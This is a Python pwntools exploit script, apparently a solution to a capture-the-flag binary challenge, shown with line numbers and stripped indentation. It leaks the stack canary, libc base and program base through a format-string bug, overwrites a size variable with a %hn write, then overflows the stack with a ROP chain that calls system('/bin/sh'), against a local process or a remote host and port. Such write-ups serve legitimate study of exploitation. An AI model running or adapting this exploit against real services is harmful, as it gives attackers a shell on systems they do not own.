1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
| #!/bin/python
# -*- coding: utf-8 -*-
"""
@author: a4
@date: 2026-03-10
"""
def menu(idx):
io.recvuntil(b">> ")
io.sendline(str(idx).encode())
return
def add():
menu(1)
return
def change(name):
menu(2)
io.sendlineafter(b"name:\n", name)
return
def edit(content):
menu(3)
io.sendlineafter(b"content\n", content)
return
def show():
menu(4)
return
def main():
buf = b"canary:%13$p;libc:%21$p;base:%15$p;"
change(buf)
io.recvuntil(b"canary:")
canary = int(io.recvuntil(b";", drop=True),16)
io.recvuntil(b"libc:")
magic_num_1 = 0x76173ce62083-0x76173ce3e000
libc.address = int(io.recvuntil(b";", drop=True), 16) - magic_num_1
system = libc.sym["system"]
io.recvuntil(b"base:")
magic_num_2 = 0x5d583181747c - 0x5d5831816000
base = int(io.recvuntil(b";", drop=True), 16) - magic_num_2
nbytes = base + 0x4010
buf = b"a%9999c%8$hn%8$p"
buf+= p64(nbytes)
change(buf)
pop_rdi = base + 0x0000000000001503
retn = base + 0x1504
buf = b"a"*0x48 + p64(canary) + p64(0xdeadbeef) + p64(retn) + p64(pop_rdi) + p64(next(libc.search("/bin/sh"))) + p64(system)
edit(buf)
print("canary", hex(canary))
print("libc.address", hex(libc.address))
print("system", hex(system))
print("base", hex(base))
print("nbytes", hex(nbytes))
return
from pwn import *
from LibcSearcher import *
import sys
if len(sys.argv) == 1:
print("\033[33mPlease input binary name or remote target.\033[0m")
sys.exit(1)
BINARY = sys.argv[1]
if len(sys.argv) == 3:
if ":" in sys.argv[2]:
TARGET = sys.argv[2].split(":")
io = remote(TARGET[0], TARGET[1])
else:
io = process(BINARY)
else:
io = process(['gdbserver', '--no-disable-randomization', ':1234', BINARY])
elf = ELF(BINARY)
libc = elf.libc
context.binary = BINARY
context.log_level = "DEBUG"
if __name__ == '__main__':
main()
io.interactive()
|
